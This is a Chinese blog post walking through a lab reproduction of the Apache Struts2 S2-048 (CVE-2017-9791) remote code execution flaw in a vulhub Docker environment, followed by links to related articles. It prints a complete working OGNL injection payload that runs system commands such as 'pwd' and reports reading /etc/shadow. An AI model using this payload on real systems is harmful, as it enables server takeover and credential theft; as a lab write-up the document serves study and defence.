Struts2 S2-048远程代码执行漏洞复现

最新推荐文章于 2024-05-17 16:26:43 发布
最新推荐文章于 2024-05-17 16:26:43 发布
阅读量2.5k 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: Struts2 S2-048
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/102698163
版权

一、漏洞介绍

0x1 漏洞背景

2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞,漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2的struts2-struts1-plugin插件,远程执行代码。

0x2 漏洞产生条件
Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,由于后续数据拼接传递后处理不当导致任意代码执行


0x3 漏洞影响
Apache Struts 2.3.x系列中启用了struts2-struts1-plugin插件的版本。


二、漏洞复现

1.打开ubunut,使用里面的漏洞环境Struts2 S2-048
在这里插入图片描述

2.命令行输入: docker-compose up -d 开启 Struts2 S2-048 漏洞环境,然后查看7001和8080端口是否开启
在这里插入图片描述

3.浏览器打开测试界面

http://192.168.74.138:8080/integration/editGangster.action
需要用8080端口访问
在这里插入图片描述

先输入${1+1}以查看执行结果
可以看到页面回显2,输入1=1的逻辑正确,证明存在远程代码执行的高危漏洞
在这里插入图片描述

4.poc验证

根据官网说明,漏洞产生的原因是将用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行

Poc:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id 语句插入处').getIn
putStream())).(#q)}

id处为插入攻击语句的位置

接着把pwd注入语句中

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('pwd').getIn
putStream())).(#q)}

在这里插入图片描述

成功获取到了当前的路径

接着测试是否能够读取系统敏感数据

使用cat /etc/shadow来测试

成功读取
在这里插入图片描述

到此,Struts2 S2-048远程代码执行漏洞复现成功

解决方法

建议Apache Struts2 套件升级到最新版本

春日野穹ㅤ
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1282
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行
s2-048Struts2 反序列化漏洞
weixin_45253622的博客
12-14 1220
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞复现
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
Apache Struts2远程代码执行漏洞S2-048 CVE-2017-9791 分析和防护方案
weixin_34194087的博客
09-01 807
今天,ApacheStruts官方发布公告,漏洞编号为S2-048 CVE-2017-9791,公告称Struts2和Struts1中的一个Showcase插件可能导致远程代码执行,并评价为高危漏洞。 绿盟科技发布分析和防护方案,其中开放了在线检测工具 https://cloud.nsfocus.com/#/krosa/views/initcdr/p...
Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
最新发布
qq_51780583的博客
05-17 176
Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2014
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP
qq_51459600的博客
01-04 2641
Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP 官方描述: It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using u
墨者学院 - Apache Struts2系列
多崎巡礼的博客
01-11 2474
文章目录struct2-001struct2-004struct2-007struct2-008struct2-009 struct2-001 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执...
struts2详解
系统运维
09-06 222
Struts2是在WebWork2基础发展而来的。和struts1一样, Struts2也属于MVC框架。不过有一点大家需要注意的是:尽管Struts2和struts1在名字上的差别不是很大,但Struts2和struts1在代码编写风格上几乎是不一样的。那么既然有了struts1,为何还要推出struts2。主要是因为struts2有以下优点: 1 > 在软件设计上Struts2没有...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值(value)通过Struts2struts2-struts1-plugin的插件传递给被攻击主机,从而实现远程代码执行攻击,直接获取远程主机的控制权限。
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
pinohans#pinohans.github.io#Struts2 S2-032远程代码执行1
07-25
title: 'Struts2 S2-032远程代码执行'影响范围。
s2-048远程代码执行漏洞
Stephen Wolf
11-22 537
一、漏洞描述 触发OGNL表达式的位置是`Gangster Name`这个表单 影响版本 2.0.0 - 2.3.32 二、环境搭建 vulhub靶场搭建 三、漏洞复现 这个环境是直接下载的struts-2.3.32的showcase,部署在tomcat-8.5下。环境启动后,访问`http://your-ip:8080/sho...
struts2--(CVE-2017-9791)s2-048
Lucky1youzi的博客
03-13 113
struts2--(CVE-2017-9791)s2-048
S2-048(RCE远程代码执行
浅笑996的博客
11-23 1619
环境搭建: https://blog.csdn.net/qq_36374896/article/details/84145020 进入漏洞环境 cd vulhub-master/struts2/s2-048/ 启动s2-048环境: sudo docker-compose up 访问目标主机地址: http://192.168.91.130:8080/showcase/ 访问Integrat...
S2-048 远程代码执行漏洞
锋刃科技的博客
06-29 338
影响版本 2.0.0 - 2.3.32 漏洞搭建 cd vulhub/struts2/s2-048 docker-compose up -d 环境启动后,访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。 漏洞复现 访问Integration->Struts 1 Integration: 触发OGNL表达式的位置是Gangster Name这个表单。 输入${233*233}即可查看执行结果(剩下两个表单随意填写) 发
S2-048 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 669
漏洞背景 Apache的Struts2是一个优雅的,可扩展的开源MVC框架,主要用于创建企业级的Java Web应用程序。在Struts 2.3.X系列的Showcase插件中演示Struts2整合Struts 1的插件中存在一处任意代码执行漏洞。当你的Web应用使用了 Struts 2 Struts 1插件, 则可能导致Struts2执行由外部输入的恶意攻击代码漏洞影响 Apache ...
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值